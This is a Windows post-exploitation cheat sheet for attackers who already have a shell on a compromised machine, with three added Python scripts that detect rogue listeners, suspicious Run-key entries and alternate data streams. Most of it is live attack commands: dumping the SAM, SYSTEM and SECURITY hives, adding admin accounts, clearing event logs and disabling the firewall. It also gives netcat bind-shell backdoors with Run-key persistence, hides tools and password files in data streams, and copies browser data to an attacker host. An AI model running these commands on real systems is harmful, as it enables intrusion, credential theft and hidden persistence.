Windows Post-Exploitation: Tools, Tactics & Commands

The following is a list of helpful tools, articles and commands you can use in a situation where you've compromised a Windows machine and have a command shell, but are unable to use Meterpreter for whatever reason. There are several articles out there that list different commands but I wanted to put them all in one place. It's a work in progress.


Basic commands
dir d:
dir *.exe
dir /ah: view hidden files and dirs (same as dir /A:H)
dir /r: display alternate data streams
dir ..\otherdir
dir d:\fldr\otherfldr
ren a.txt b.txt: rename file
attrib a.txt +h: make file hidden
Query information about the system, network/network connections, running services and services that run upon startup
systeminfo: lists information about the system
ipconfig /all: query IP configuration
ipconfig /displaydns: show the DNS resolver cache
arp /a: check out viable targets (hosts recently seen on the local network)
fsutil fsinfo drives: query current drives on the system

Grab SAM and SYSTEM files (backup copies kept by older Windows versions; they are binary registry hives, so type will not render them readably)
type "C:\windows\repair\SAM"
type "C:\windows\repair\SYSTEM"

Tasks
tasklist /svc: lists running processes and the services hosted in each
taskkill /PID <process ID> /F: forcibly kill a task by PID
taskkill /IM <image name>: kill by image name; a trailing * wildcard (e.g. taskkill /IM name*) kills all processes whose name starts the same way

netstat -ano: see what is listening on which ports, with the owning PID
netstat -bano: same, plus the executable that owns each socket (needs elevation)
netstat -r: show the routing table
netstat -na | findstr :443: filter for a particular port
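From the defender's side, the same two commands are what you review after a suspected compromise: netstat -ano tells you which ports are listening and which PID owns them, and tasklist /svc tells you what image that PID is. The script below is an added example (not part of the original cheat sheet) that parses constructed sample output of both commands, joins them on PID, and reports every listener that is not on an allow-list of expected ports. The sample text, the allow-list and the netcat process in it are all made up for the example.

```python
import re

# Constructed sample output of `netstat -ano` (not captured from a real host).
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:6996           0.0.0.0:0              LISTENING       3412
  TCP    192.168.1.10:49700     203.0.113.5:443        ESTABLISHED     2208
  TCP    [::]:3389              [::]:0                 LISTENING       1104
  UDP    0.0.0.0:4444           *:*                                    3412
"""

# Constructed sample output of `tasklist /svc`.
TASKLIST_SAMPLE = """
Image Name                     PID Services
========================= ======== ============================================
System                           4 N/A
svchost.exe                    880 RpcEptMapper, RpcSs
svchost.exe                   1104 TermService
chrome.exe                    2208 N/A
nc.exe                        3412 N/A
"""

# tasklist rows: image name, then PID, then the comma-separated service list.
TASK_RE = re.compile(r"^(?P<image>\S.*?)\s+(?P<pid>\d+)\s+(?P<svcs>.*)$")


def parse_tasklist(text):
    """Map PID -> (image name, services) from `tasklist /svc` output."""
    procs = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith(("Image Name", "=")):
            continue
        m = TASK_RE.match(line)
        if m:
            procs[int(m.group("pid"))] = (m.group("image"), m.group("svcs").strip())
    return procs


def parse_listeners(text):
    """Yield (proto, port, pid) for every listening socket in `netstat -ano` output.
    TCP rows carry a State column; UDP rows have none, so every UDP row counts as a listener."""
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0] not in ("TCP", "UDP"):
            continue
        proto, local = parts[0], parts[1]
        port = int(local.rsplit(":", 1)[1])   # works for 0.0.0.0:135 and [::]:3389 alike
        if proto == "TCP":
            state, pid = parts[3], int(parts[4])
            if state != "LISTENING":
                continue
        else:
            pid = int(parts[-1])
        yield proto, port, pid


def unexpected_listeners(netstat_text, tasklist_text, allowed_ports):
    """Return (proto, port, pid, image, services) for listeners whose port is not allow-listed."""
    procs = parse_tasklist(tasklist_text)
    findings = []
    for proto, port, pid in parse_listeners(netstat_text):
        if port in allowed_ports:
            continue
        image, svcs = procs.get(pid, ("<unknown>", ""))
        findings.append((proto, port, pid, image, svcs))
    return findings


if __name__ == "__main__":
    # Constructed allow-list: RPC, SMB and RDP are expected on this sample host.
    for f in unexpected_listeners(NETSTAT_SAMPLE, TASKLIST_SAMPLE, {135, 445, 3389}):
        print("%s port %d owned by PID %d (%s) %s" % f)
```

On a real host you would feed the script the saved output of the two commands; the join on PID is what turns "something is listening on 6996" into "nc.exe is listening on 6996", which is the fact worth acting on.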

nslookup: query DNS server information
nbtstat: displays protocol stats and current TCP/IP connections using NetBIOS over TCP/IP
Query information about server and workstation, workstation domain name and logon domain:
net config server
net config workstation
net share: view resources shared from this machine
Change to a different drive letter, e.g. change to D:\ and list its contents:
d: & dir
cd /d d: & dir
Cat the contents of a file located on D:\
type d:\blah\blah
View hosts in the domain, in another domain, or the shares on a specific host:
net view
net view /domain[:DomainName]
net view \\computerName
arp /a

Query user information
whoami: view logged on user
whoami /all: lists user, groups and privileges
whoami /user
whoami /groups
whoami /priv
net user: list users
For more info on a user:
net user <username> (for a local user)
net user <username> /domain (for a domain user)
net accounts: password and lockout policy
net accounts /domain
net localgroup administrators
net localgroup administrators /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
arp -a: lists all the systems currently in the machine's ARP table
route print: prints the machine's routing table
type "C:\documents and settings\administrator\userdata\index.dat"
Add user:
net user <username> <password> /add
Add user to local administrators group:
net localgroup administrators <username> /add
Delete a user:
net user <username> /delete /domain
Change user's password:
net user <username> <new_password>
View domain admins:
net group "Domain Admins" /domain
View name of domain controller:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History" /v DC

Query group information:
net localgroup: list local groups
net localgroup Administrators: list members of the local Administrators group
net localgroup /domain
gpresult: view applied group policy
gpupdate: refresh group policy
gpresult /z: very verbose group policy output
type %WINDIR%\System32\drivers\etc\hosts: view contents of the hosts file
Remote System Access
● net share \\computername
● qwinsta /SERVER:computername
● qprocess /SERVER:computername *
● net use \\computername (maps IPC$, which does not show up as a drive)
● net use \\computername /user:DOMAINNAME\username password (maps IPC$ under another username)
● net time \\computername (shows the time of the target computer)
● dir \\computername\share_or_admin_share\ (lists a remote directory)
● tasklist /V /S computername
○ Lists tasks with the users running them on a remote system. This removes any IPC$ connection after it is done, so if you are using another user you need to re-initiate the IPC$ mount.

Reg Command
reg save HKLM\Security security.hive (save the Security hive to a file)
reg save HKLM\System system.hive (save the System hive to a file)
reg save HKLM\SAM sam.hive (save the SAM hive to a file)
reg add [\\TargetIPaddr\][RegDomain]\[Key]
reg export [RegDomain]\[Key] [FileName]
reg import [FileName]
reg query [\\TargetIPaddr\][RegDomain]\[Key] /v [ValueName] (add /s to recurse through all subkeys and values)

Deleting Logs
wevtutil el (list logs)
wevtutil cl <logname> (clear a log)
Uninstalling Software
wmic product get name /value: gets software names
wmic product where name="XXX" call uninstall /Interactive:Off: uninstalls software

Permissions:
icacls <file or dir>: view permissions
Grant full access over a directory and all folders and files beneath it:
icacls "C:\windows" /grant Administrator:F /T
icacls "C:\" /grant "nt authority\system":F /T
net use: map network shares
Mount a remote share with the rights of the current user:
net use K: \\<ip>\<share>
dir K:

Netcat
Create a listener on Linux:
nc -l -p 6996 -e /bin/sh
Create a persistent backdoor on Windows:
nc -L -p 6996 -e c:\windows\system32\cmd.exe
On the attacking system:
nc <ip> 6996
Transfer a file. On the victim:
nc -L -p 6996 > virus.exe
On the attacker:
nc <ip> 6996 < virus.exe
Add a Run registry key so netcat starts at logon, listening on UDP port 4444, then allow it through the firewall with netsh:
reg add HKLM\software\microsoft\windows\currentversion\run /v netcat /d "C:\windows\system32\nc.exe -udp 4444 -e cmd.exe"
TCP variant of the same key:
reg add HKLM\software\microsoft\windows\currentversion\run /v netcat /d "C:\windows\system32\nc.exe -Ldp 4444 -e cmd.exe"
netsh firewall set allowedprogram c:\nc.exe allow_nc ENABLE
Enable Remote Desktop:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Allow a port or program through the firewall:
netsh.exe firewall set portopening tcp 123 MYSERVICE enable all
netsh.exe firewall set allowedprogram C:\MYPROGRAM.exe MYPROGRAM ENABLE
Other Firewall commands
Query state of firewall:
netsh firewall show state
Disable firewall:
netsh.exe firewall set opmode mode=disable profile=all
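The Run key used above for netcat persistence is also one of the first places to look when triaging a box. As an added example (not from the original cheat sheet), the script below parses constructed sample output of reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and flags values whose executable is on a small watchlist, whose command line uses an nc-style -e option, or whose executable lives outside the usual Windows and Program Files locations. The sample output, the watchlist and the trusted-prefix list are assumptions chosen for the example; the netcat value mirrors the reg add shown above.

```python
import re
import ntpath

# Constructed sample output of
#   reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
# (not captured from a real host). reg query separates columns with four spaces.
REG_QUERY_SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    netcat    REG_SZ    C:\windows\system32\nc.exe -Ldp 4444 -e cmd.exe
    updater    REG_SZ    C:\Users\Public\svchost.exe
"""

VALUE_RE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")

# Assumed watchlist: executables that have no business autostarting on a workstation.
WATCHLIST = {"nc.exe", "ncat.exe", "cmd.exe", "powershell.exe"}
# Assumed trusted prefixes: where legitimate autostart entries normally live.
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files", "%windir%\\", "%programfiles%\\")


def parse_run_values(text):
    """Return (value name, type, data) for each value row in `reg query` output."""
    values = []
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            values.append((m.group("name"), m.group("type"), m.group("data").strip()))
    return values


def executable_of(command):
    """Extract the executable path from a command line, honouring a quoted first token."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def suspicious_run_entries(text):
    """Return (value name, executable, reasons) for every Run value that trips a heuristic."""
    findings = []
    for name, _type, data in parse_run_values(text):
        exe = executable_of(data)
        base = ntpath.basename(exe).lower()
        reasons = []
        if base in WATCHLIST:
            reasons.append("watchlisted executable")
        if re.search(r"(^|\s)-e\s", data):
            reasons.append("-e option (runs a program on connect)")
        if not exe.lower().startswith(TRUSTED_PREFIXES):
            reasons.append("unusual location")
        if reasons:
            findings.append((name, exe, reasons))
    return findings


if __name__ == "__main__":
    for name, exe, reasons in suspicious_run_entries(REG_QUERY_SAMPLE):
        print("%s -> %s: %s" % (name, exe, ", ".join(reasons)))
```

The same parser works on the HKCU Run key and on the RunOnce keys; wmic startup get caption,command (listed further down) is the other quick view of the same data.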


Files
Symbolic links
Make a file or directory that exists somewhere appear to exist somewhere else.
Can make c:\windows appear in the root of a web server and bypass security restrictions.
ex
mkdir \testing
cd \testing
mklink /D blah c:\testing
dir /s blah\*.*
Alternate Data Streams (ADS)
Use to hide malicious files from view.
Add file data into existing files without affecting their functionality, size or display in utilities.
ex
upload an image (logo.png)
echo I need to hide this > hideme.txt
type hideme.txt > logo.png:myads.txt
del hideme.txt
View the contents of the ADS:
notepad logo.png:myads.txt
To look for ADS:
dir /r
ex
echo "Main file" > c:\main.txt
echo "this is the stream" > c:\main.txt:strm.txt
dir /s windows > c:\main.txt:dir.txt
notepad c:\main.txt
notepad c:\main.txt:strm.txt
notepad c:\main.txt:dir.txt
del c:\main.txt
dir.txt contains the entire Windows directory structure
Set up an alternate data stream to steal passwords and feed them back to you.
To hide nc using an alternate data stream:
mklink bd.exe c:\testing\main.txt:nc.exe
mklink passwds c:\testing\main.txt:pw.txt
bd -l -p 9000 < passwds
del bd.exe
del passwds
To display the contents of an alternate data stream from the command line:
more < c:\main.txt:strm.txt
Hide files and find those that are hidden:
dir /A:H: list hidden files (/A = attributes, H = hidden)
dir /R: display alternate data streams
dir /S: display files in the directory and all subdirectories
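dir /r is the native way to spot the streams described above, but on a large tree its output is long and the stream rows are easy to miss. The script below is an added example (not part of the original cheat sheet) that parses constructed dir /r output, tracks the "Directory of" headers so each stream gets a full path, and lists every named $DATA stream except Zone.Identifier, which browsers write on downloaded files and is normally noise. The sample listing, including the main.txt and logo.png streams from the example above, is made up for the script.

```python
import re

# Constructed sample output of `dir /r` run over C:\ (not captured from a real host).
DIR_R_SAMPLE = r"""
 Volume in drive C has no label.
 Volume Serial Number is 1A2B-3C4D

 Directory of C:\

02/10/2024  09:14 AM                11 main.txt
                                    19 main.txt:strm.txt:$DATA
                                 4,208 main.txt:dir.txt:$DATA
02/10/2024  09:20 AM             8,731 logo.png
                                    20 logo.png:myads.txt:$DATA
02/10/2024  09:25 AM    <DIR>          testing
               2 File(s)          8,742 bytes

 Directory of C:\testing

02/10/2024  09:30 AM             1,024 setup.exe
                                    26 setup.exe:Zone.Identifier:$DATA
               1 File(s)          1,024 bytes
               1 Dir(s)  40,000,000,000 bytes free
"""

DIRECTORY_RE = re.compile(r"^\s*Directory of (?P<dir>.+?)\s*$")
# A stream row has no date/time columns: just a size, then "file:stream:$DATA".
STREAM_RE = re.compile(r"^\s*(?P<size>\d[\d,]*)\s+(?P<file>.+?):(?P<stream>[^:\\]+):\$DATA\s*$")

# Zone.Identifier marks downloaded files (mark-of-the-web); ignore it by default.
BENIGN_STREAMS = {"Zone.Identifier"}


def find_streams(dir_output, ignore=BENIGN_STREAMS):
    """Return (full path, stream name, size in bytes) for every named data stream in dir /r output."""
    current_dir = ""
    found = []
    for line in dir_output.splitlines():
        d = DIRECTORY_RE.match(line)
        if d:
            current_dir = d.group("dir")
            continue
        m = STREAM_RE.match(line)
        if not m or m.group("stream") in ignore:
            continue
        path = current_dir.rstrip("\\") + "\\" + m.group("file")
        size = int(m.group("size").replace(",", ""))   # dir prints thousands separators
        found.append((path, m.group("stream"), size))
    return found


if __name__ == "__main__":
    for path, stream, size in find_streams(DIR_R_SAMPLE):
        print("%s:%s (%d bytes)" % (path, stream, size))
```

Run dir /r /s C:\ > streams.txt on the host and feed the file to find_streams; anything that is not Zone.Identifier deserves a look, and a stream with an executable-sized payload on an otherwise small file (the nc.exe trick above) stands out immediately.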

Services
services.msc
View all running services:
net start
Start or stop a service, e.g. the print spooler:
net start "print spooler" / net stop "print spooler"
Query services:
sc query
sc query state= inactive
sc query state= all
Query config of the print spooler service:
sc qc spooler
sc start spooler
sc stop spooler
Disable/enable a service at startup:
sc config spooler start= disabled
sc config spooler start= auto
Values accepted by start=:
  • boot: device driver loaded by the boot loader
  • system: device driver started during kernel initialization
  • auto: starts automatically
  • demand: service must be started manually
View processes/services started upon startup:
net start
sc query
wmic startup get caption,command
Query, stop/start/pause installed services:
sc query state= all
sc query <service>
sc stop|start|pause <service>
qwinsta: query info about RDP sessions
qprocess *: similar to tasklist but easier to read
at: query current scheduled tasks (legacy scheduler)
schtasks: query scheduled tasks that your current user has access to see
set: list environment variables
schtasks /query /fo csv /v > %TEMP%\tasks.csv
WMIC
wmic useraccount
wmic startup get caption,command
Process management via WMIC
Create process:
wmic process call create svs.exe
List processes:
wmic process list brief
wmic process where (name = "svs.exe") list brief
wmic process where (name = "svs.exe") list full
Kill process:
wmic process where (name = "svs.exe") delete
WMI
wmic bios
wmic qfe
wmic qfe get hotfixid (lists installed patch IDs)
wmic startup
wmic service
wmic os
wmic process get caption,executablepath,commandline
wmic process call create "process_name" (executes a program)
wmic process where name="process_name" call terminate (terminates a program)
wmic logicaldisk where drivetype=3 get name,freespace,systemname,filesystem,size,volumeserialnumber (hard drive information)
wmic useraccount (usernames, SIDs and various security related goodies)
wmic useraccount get /ALL
wmic share get /ALL (append /? to any wmic command for help)
wmic startup list full (this can be a huge list!)
wmic /node:"hostname" bios get serialnumber (this can be great for finding warranty info about a target)
Other potentially useful misc commands
pkgmgr /iu:"Package": install a Windows feature package
pkgmgr /iu:"TelnetServer": install the telnet service
pkgmgr /iu:"TelnetClient"
rundll32.exe user32.dll,LockWorkStation: locks the screen
wscript.exe <script .js/.vbs>
cscript.exe <script .js/.vbs>
xcopy /C /S %appdata%\Mozilla\Firefox\Profiles\*.sqlite \\your_box
Enable remote desktop:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net session: list session information
type "c:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials"
cd "C:\Documents and settings\administrator\userdata" & dir
type "c:\Documents and Settings\Administrator\Desktop\UserMysql.txt"
type "c:\Documents and Settings\Administrator\Application Data\MySQL\mysqlx_user_connections.xml"
